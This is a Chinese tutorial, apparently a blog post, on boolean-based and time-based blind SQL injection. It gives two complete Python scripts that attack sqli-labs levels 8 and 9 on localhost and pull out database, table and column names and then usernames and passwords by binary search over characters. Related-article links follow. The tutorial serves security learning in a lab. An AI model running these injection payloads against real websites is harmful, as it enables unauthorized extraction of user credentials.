SQL布尔盲注、时间盲注

一、布尔盲注

布尔盲注(Boolean-based Blind SQL Injection)是一种SQL注入技术,用于在应用程序不直接显示数据库查询结果的情况下,通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假,进而推断出数据库中的具体信息。

案例为sqlilabs中的第八关,采用二分查找

python脚本:

python 复制代码
import requests
def get_database(URL):
    # 获取数据库名称
    s = ""
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "}  # 相当于第一个字符<={mid}条件判断为真
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                high = mid
                mid = (low + high) // 2
            else:
                low = mid + 1
                mid = (low + high) // 2
        s += chr(mid)
    print("数据库名称:" + s)


def get_table(URL):
    # 获取表名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("表的名称:" + s)


def get_column(URL):
    # 获取管理员的字段名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表的列:" + s)


def get_result(URl):
    # 获取用户名和密码信息
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表具体数据:" + s)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-8/index.php"
    get_database(URL)
    get_table(URL)
    get_column(URL)
    get_result(URL)

运行结果

二、时间盲注

时间盲注(Time-based Blind SQL Injection)是一种SQL注入技术,用于在应用程序没有直接回显数据库查询结果的情况下,通过构造特定的SQL查询来推测数据库中的信息。这种方法依赖于数据库处理查询时产生的延迟响应来判断条件的真假。

案例为sqlilabs中的第九关,同样为二分查找

python脚本

python 复制代码
import requests
import datetime

def get_database(URL):
    # 获取数据库名称
    s = ""
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "}  # 相当于第一个字符<={mid}条件判断为真
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                high = mid
                mid = (low + high) // 2
            else:
                low = mid + 1
                mid = (low + high) // 2
        s += chr(mid)
        print("数据库名称:" + s)


def get_table(URL):
    # 获取表名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("表的名称:" + s)


def get_column(URL):
    # 获取管理员的字段名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表的列:" + s)


def get_result(URl):
    # 获取用户名和密码信息
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users中的具体数据:" + s)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-9/index.php"
    # get_database(URL)
    get_table(URL)
    # get_column(URL)
    # get_result(URL)

运行结果:

相关推荐
李元豪22 分钟前
grpo nl2sql qwen3 模型强化学习训练有效果的成立条件有哪些
数据库·oracle
Hello.Reader3 小时前
RedisJSON 路径语法深度解析与实战
数据库·redis·缓存
TDengine (老段)4 小时前
TDengine 使用最佳实践(2)
大数据·数据库·物联网·时序数据库·iot·tdengine·涛思数据
设计师小聂!7 小时前
Linux系统中部署Redis详解
linux·运维·数据库·redis
kfepiza7 小时前
Debian-10编译安装Mysql-5.7.44 笔记250706
linux·数据库·笔记·mysql·debian·bash
Touper.7 小时前
Redis 基础详细介绍(Redis简单介绍,命令行客户端,Redis 命令,Java客户端)
java·数据库·redis
不剪发的Tony老师7 小时前
phpMyAdmin:一款经典的MySQL在线管理工具又回来了
数据库·mysql·phpmyadmin
极限实验室7 小时前
TDBC 2025 可信数据库发展大会,极限科技邀您来赴约!
数据库
lixia0417mul29 小时前
使用Starrocks替换Clickhouse的理由
数据库
张璐月9 小时前
mysql的性能优化:组提交、数据页复用、全表扫描优化、刷脏页
数据库·mysql·性能优化